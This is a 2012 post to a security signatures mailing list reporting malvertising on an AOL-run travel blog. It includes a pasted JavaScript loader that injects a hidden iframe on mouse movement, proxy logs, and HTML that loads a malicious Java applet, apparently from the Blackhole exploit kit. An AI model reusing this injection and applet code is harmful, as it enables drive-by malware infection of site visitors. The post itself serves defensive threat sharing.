[Emerging-Sigs] [PHI] [Domain Keys] Blackhole served via Yahoo

Nathan nathan at packetmail.net
Mon Dec 17 09:57:17 HAST 2012


Got hits

http://blogsmithmedia.net/Java.jar in the last 10 minutes or so.  Looks like
Malvertising from a 1px iframe.  How is this trash still allowed?  Looks like
it's coming in through http://blogsmithmedia.net/ads.min.js in my example. 
AOL?

    © 2012 AOL Inc. All rights Reserved. <a
href="http://privacy.aol.com/">Privacy Policy</a>
    | <a href="http://legal.aol.com/TOS">Terms of Use</a>
    | <a href="http://about.aol.com/aolnetwork/trademarks">Trademarks</a>
    | <a href="http://help.aol.com">AOL A-Z HELP</a>
    | <a href="http://advertising.aol.com/brands/gadling">Advertise With Us</a>
    | <a href="http://adinfo.aol.com/about-our-ads/">About Our Ads</a>
</p><script type="text/javascript"
src="http://blogsmithmedia.net/ads.min.js"></script>



[17/Dec/2012:12:07:01 -0700] 
200	971	text/javascript	http://blogsmithmedia.net/ads.min.js	http://www.gadling.com/2012/12/07/a-solo-stroll-through-baghdad/?icid=maing-grid7%7Cmaing5%7Cdl13%7Csec1_lnk3%26pLid%3D245264

[17/Dec/2012:12:07:02 -0700] 
200	150	text/html	http://blogsmithmedia.net/nav.php	http://www.gadling.com/2012/12/07/a-solo-stroll-through-baghdad/?icid=maing-grid7%7Cmaing5%7Cdl13%7Csec1_lnk3%26pLid%3D245264

[17/Dec/2012:12:07:04 -0700] 
200	2903	application/octet-stream	http://blogsmithmedia.net/Java.jar	-

##Body##

~.l.3...P.A.....var addListener, removeListener;
if (document.addEventListener) {
    addListener = function (el, evt, f) { return el.addEventListener(evt, f,
false); };
    removeListener = function (el, evt, f) { return el.removeEventListener(evt,
f, false); };
} else {
    addListener = function (el, evt, f) { return el.attachEvent('on' + evt, f);
};
    removeListener = function (el, evt, f) { return el.detachEvent('on' + evt,
f); };
}

var myListener = function () {
    removeListener(document, 'mousemove', myListener);
        var cdn = document.createElement('div');
        cdn.style.zIndex = -1;
        cdn.style.visibility = 'hidden';
        cdn.style.position = 'absolute';
        cdn.style.width = '50px';
        cdn.style.height = '40px';
        cdn.innerHTML = '<iframe width="50" height="40" frameborder="0"
scrolling="no" src="http://blogsmithmedia.net/nav.php"></iframe>';
        if (document.body != null){ document.body.appendChild(cdn); }
};

addListener(document, 'mousemove', myListener);


HTTP/1.1 200 OK
Age: 0
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV
TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL
UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Date: Mon, 17 Dec 2012 19:07:02 GMT
Server: YTS/1.19.11
Set-Cookie: BX=aapp1018curam&b=3&s=55; expires=Tue, 02-Jun-2037 20:00:00 GMT;
path=/; domain=.blogsmithmedia.net
Content-Type: text/html
Proxy-Connection: Keep-Alive
Transfer-Encoding: chunked

<iframe width="1" height="1" frameborder="0"></iframe><applet width="0px"
height="0px" code="Java.class" archive="Java.jar" name="AOL, Inc."></applet>

Thanks,
Nathan




More information about the Emerging-sigs mailing list